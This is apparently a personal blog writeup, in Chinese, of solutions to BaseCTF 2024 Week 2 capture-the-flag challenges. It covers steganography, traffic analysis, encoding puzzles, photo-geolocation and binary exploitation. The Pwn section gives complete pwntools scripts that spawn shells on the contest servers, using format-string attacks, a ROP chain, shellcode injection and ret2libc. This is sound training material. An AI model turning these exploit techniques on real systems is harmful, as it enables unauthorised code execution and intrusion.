BaseCTF2024 Week2 Writeup
G3rling
|
|
比赛WriteUp
|
30
|
0
|

Misc

二维码1-街头小广告

QR Research扫码得到信息

https://www.bilibili.com@qr.xinshi.fun/BV11k4y1X7Rj/mal1ci0us?flag=BaseCTF%7BQR_Code_1s_A_f0rM_Of_m3s5ag3%7D

得到flag

BaseCTF{QR_Code_1s_A_f0rM_Of_m3s5ag3}

反方向的雪

010查看,发现末尾为zip文件头reverse后的十六进制,进行reverse

image-20240822100328301

reverse后发现key

The_key_is_n0secr3t

根据提示压缩包密码为六位数,进行爆破,得到密码为123456

解压出flag.txt,010查看,发现明显snow隐写特征

image-20240822124553468

snow隐写解码得到flag

SNOW.EXE -C -p n0secr3t flag.txt
BaseCTF{Y0u_g0t_1t!}

ez_crypto

xxencode进行解密

xxencode !!!Give your flag:BaseCTF{BaseCTF_is_So_Good!!}

得到flag

BaseCTF{BaseCTF_is_So_Good!!}

Base?!

发现一串base,但是直接解码不对,先对BaseCTF头进行base64加密

QmFzZUNURg==

发现与题目的字符串大小写相反,所以我们转化大小写后进行解码,得到flag

BaseCTF{Th1s_1s_4n_ez_b4se64dec0de}

哇!珍德食泥鸭

先将gif的每一张图进行分离,并无异样,打开010查看发现docx文件标志,进行分离

先关闭隐藏更改字体颜色,在docx末尾将白块删除得到flag

BaseCTF{a651c13d-9600-437e-90ca-40d740fa7cb4}

海上又遇了鲨鱼

在流量包中导出flag.zip,解压时发现需要密码,并得到以下信息

you need password!!!
repeat password???

返回流量包中进行查看,对TCP流进行追踪,发现password

image-20240822103903115

PASS Ba3eBa3e!@#

解压后得到flag

BaseCTF{W1r3sharK_3at_r3p3at_paSsw0rd}

黑丝上的flag

010初步检查无异常,查看通道,在A1发现flag

image-20240822104309621

BaseCTF{Bl4ck_5ilk_1s_the_be5t}

Aura 酱的旅行日记

国内照片直接先小红书搜搜

image-20240822104800271

搜索成都自然博物馆地址,得到flag

BaseCTF{成都市成华区成华大道十里店路88号}

前辈什么的最喜欢了

赛博厨子一把梭,得到一张png图片,打开发现CRC错误,更改宽高

image-20240822105128970

得到flag

BaseCTF{q1n6_k4n_zh3_w0}

Aura 酱的旅行日记 II

根据图片可以看到首东置业,地图查看,根据图片酒店应该处于首东置业的西北方向,对酒店进行遍历,得到flag

BaseCTF{四川省成都市吉瑞二路188号成都盛捷高新服务公寓}

Aura 酱的旅行日记 III

从图片的横幅可以得到关键信息

image-20240823170115707

得到flag

BaseCTF{四川省眉山市洪雅县瓦屋山风景区}

Aura 酱的旅行日记 IV

识图找到地点

image-20240829101748858

得到flag

BaseCTF{江苏省南京市秦淮区贡院街夫子庙景区}

Aura 酱的旅行日记 V

识图找到地点

image-20240829102737132

再邓小平故里附近搜索广场和陈列馆,得到flag

BaseCTF{四川省广安市广安区邓小平故里-邓小平铜像广场and邓小平故居陈列馆}

Aura 酱的旅行日记 VI

根据图片搜索迎泽派出所校园警务室,并通过街景确定地点,搜索建校日期,得到flag

BaseCTF{山西省太原市迎泽区青年路49号太原市第五中学校-建校时间1906年}

Aura 酱的旅行日记 VII

查看图片发现科创大厦和一分利,并且右下角有个北京烤鸭,进行搜索。因为下雪所以优先考虑北方。仔细看一分利旁边有鸿?连锁

搜索鸿?连锁一分利,发现抖音账号以及地址

image-20240830230638482

得到flag

BaseCTF{河南省安阳市文峰区峨嵋大街与广顺街交叉口}

Aura 酱的旅行日记 VIII

抖音发现相关信息

image-20240830231728665

搜索布鲁维斯号以及周边餐厅,得到flag

BaseCTF{山东省威海市荣成市环海路布鲁之星海岸餐厅-布鲁维斯号-巴拿马}

Aura 酱的旅行日记 IX

识图找到关键信息

image-20240829112118282

搜索发现桥是西安浐灞2号桥

搜索附近景区发现西安后海,得到flag

BaseCTF{陕西省西安市灞桥区后海-欧亚大道}

Pwn

format_string_level0

查看保护,保护全开

    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

题目提供了ld先更改libc文件

ldd vuln
        linux-vdso.so.1 (0x00007fff800e1000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fdf6d440000)
        /lib64/ld-linux-x86-64.so.2 (0x00007fdf6d67a000)
patchelf --set-interpreter ./ld-linux-x86-64.so.2 --replace-nee
ded libc.so.6 ./libc.so.6 ./vuln
ldd vuln
        linux-vdso.so.1 (0x00007ffd565af000)
        ./libc.so.6 (0x00007fe3fc58e000)
        ./ld-linux-x86-64.so.2 => /lib64/ld-linux-x86-64.so.2 (0x00007fe3fc7bf000)

主函数部分发现格式化字符串漏洞,先计算输入处的偏移

payload=b"DDDDDDDD%p.%p.%p.%p.%p.%p.%p.%p.%p.%p"  偏移10
DDDDDDDD0x7ffd58ce6720.0x100.0x7f7db93f57e2.0x21001.0x55cd47c492a0.(nil).0x300000000.0x55cd47c492a0.0x10.0x4444444444444444

通过栈可以找到flag存放处的偏移

image-20240902191701945

另一种方法是在printf处输入指令,参数填目标地址

pwndbg> fmtarg 0x7fffffffde20
The index of format argument : 8 ("\%7$p")

所以我们需要读取偏移为8处的字符,得到payload

from pwn import*

# io=process("1")
io=remote("challenge.basectf.fun",37814)

# payload=b"DDDDDDDD%p.%p.%p.%p.%p.%p.%p.%p.%p.%p"  偏移10
payload=b"%8$s"
io.sendline(payload)

io.interactive()
# BaseCTF{211bde83-2a11-43fa-9c54-c8a54ed463cc}

format_string_level1

检查保护,只开了Canary和代码执行保护

    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

先计算出输入数据的偏移为6

fmtarg 0x7fffffffde30
The index of format argument : 6 ("\%5$p")

主函数需要将target非零才能进入if,所以这里向target地址(0x4040B0)写入1

from pwn import*

context.arch="amd64"
# io=process("1")
io=remote("challenge.basectf.fun",45829)
elf=ELF("1")

# gdb.attach(io,"b *0x4013CC")
# pause()

payload=fmtstr_payload(6,{0x4040B0:1},write_size='short')

print(payload)
print(len(payload))

io.sendline(payload)

io.interactive()
# BaseCTF{94523f3b-db87-445c-aa67-f2b27264863c}

 gift

检查保护,只开了Canary

    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX unknown - GNU_STACK missing
    PIE:      No PIE (0x400000)
    Stack:    Executable
    RWX:      Has RWX segments

这一题使用ret2syscall,学到了一种一把梭的办法,通过ROPgadget帮我们写出程序

ROPgadget --binary 1 --ropchain

写出exp

from pwn import*
from struct import pack

io=remote("challenge.basectf.fun",34814)
# io=process("./1")
p = b''

p += pack('<Q', 0x0000000000409f9e) # pop rsi ; ret
p += pack('<Q', 0x00000000004c50e0) # @ .data
p += pack('<Q', 0x0000000000419484) # pop rax ; ret
p += b'/bin//sh'
p += pack('<Q', 0x000000000044a5e5) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000409f9e) # pop rsi ; ret
p += pack('<Q', 0x00000000004c50e8) # @ .data + 8
p += pack('<Q', 0x000000000043d350) # xor rax, rax ; ret
p += pack('<Q', 0x000000000044a5e5) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000401f2f) # pop rdi ; ret
p += pack('<Q', 0x00000000004c50e0) # @ .data
p += pack('<Q', 0x0000000000409f9e) # pop rsi ; ret
p += pack('<Q', 0x00000000004c50e8) # @ .data + 8
p += pack('<Q', 0x000000000047f2eb) # pop rdx ; pop rbx ; ret
p += pack('<Q', 0x00000000004c50e8) # @ .data + 8
p += pack('<Q', 0x4141414141414141) # padding
p += pack('<Q', 0x000000000043d350) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000401ce4) # syscall

payload=b'a'*(0x20+8)+p

io.sendlineafter(b'same',payload)

io.interactive()
# BaseCTF{b3a08c25-59e7-4365-9e51-2233f13c886d}

shellcode_level1

检查保护,发现保护全开

    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

首先是调用了mmap函数。作用为定义在一个(0)任意系统分配的地址,大小为0x100,可读可写可执行(111)的空间赋值给buf

buf = mmap(0LL, 0x1000uLL, 7, 34, -1, 0LL);

这行代码用于执行buf写入的代码,但是read处只接收两字节的数据

((void (__fastcall *)(_QWORD, void *, __int64))buf)(0LL, buf, 1280LL);

当执行 call rcx的时候各寄存器情况,rax存放系统调用调用表,当rax存储0时,调用syscall会自动调用read函数

*RAX  0x0
 RDX  0x500
 RDI  0x0
 RSI  0x7ffff7ffa000 ◂— 0xa /* '\n' */

read函数参数如下,RSI中存入的是buf的地址,可以利用两字节调用syscall来写入shellcode

read(RDI,RSI,RDX)   -->      read(0,buf,0x500)

写出exp

from pwn import*

# io=process("1")
io=remote("challenge.basectf.fun",41602)

context.arch="amd64"
# gdb,attach(io,"b $rebase(0x1225)")
# pause()

io.send(asm('''syscall'''))

payload=asm('''syscall''')+asm(shellcraft.sh())
io.sendline(payload)

io.interactive()
# BaseCTF{f889c737-3b21-42df-a801-e87c0ca34d78}

她与你皆失

检查保护,只开了代码执行保护

    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

查看主函数,发现栈溢出,尝试ret2libc,查询发现ret_add和pop_rdi

ROPgadget --binary 1 --only "pop|ret"
Gadgets information
============================================================
0x000000000040115d : pop rbp ; ret
0x0000000000401176 : pop rdi ; ret
0x0000000000401221 : pop rdx ; ret
0x0000000000401178 : pop rsi ; ret
0x000000000040101a : ret
0x00000000004011ba : ret 0xfffe

exp

from pwn import *
from LibcSearcher import *

# io=process("1")
io = remote('challenge.basectf.fun',21375)
elf = ELF('1')
libc= ELF('libc.so.6')

ret_add = 0x040101a
pop_rdi = 0x0401176
main_add = 0x4011DF
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']

offset=0x0A

payload = b'\x00'+ b'a' * (offset+8-1) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_add)
io.sendlineafter('do?', payload)
puts_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print(hex(puts_addr))

libc_base = puts_addr - libc.symbols['puts']
system_add = libc_base + libc.symbols['system']
bin_sh_add = libc_base + next(libc.search(b'/bin/sh'))

payload = b'\x00'+ b'a' * (offset+8-1) + p64(ret_add) + p64(pop_rdi) + p64(bin_sh_add) + p64(system_add)

io.sendlineafter('do?', payload)
io.interactive()
# BaseCTF{5a91b747-51e8-4b2c-9f61-be9d3428c441}
暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
													

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																

							
							
						

																

							
							
						

										
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇 

                    

                    
			        推荐文章
		            

		            

							
BaseCTF2024 Week4 Writeup

							
							

							
BaseCTF2024 Week3 Writeup

							
							

							
羊城杯2024 Writeup

							
							

							
BaseCTF2024 Week1 Writeup

							
							

							
MuleCTF Writeup

							
							

							
TFCCTF2024 Writeup

							
							

							
XGCTF西瓜杯 Writeup

							
							

							
第五届“闽盾杯”Misc部分复现Writeup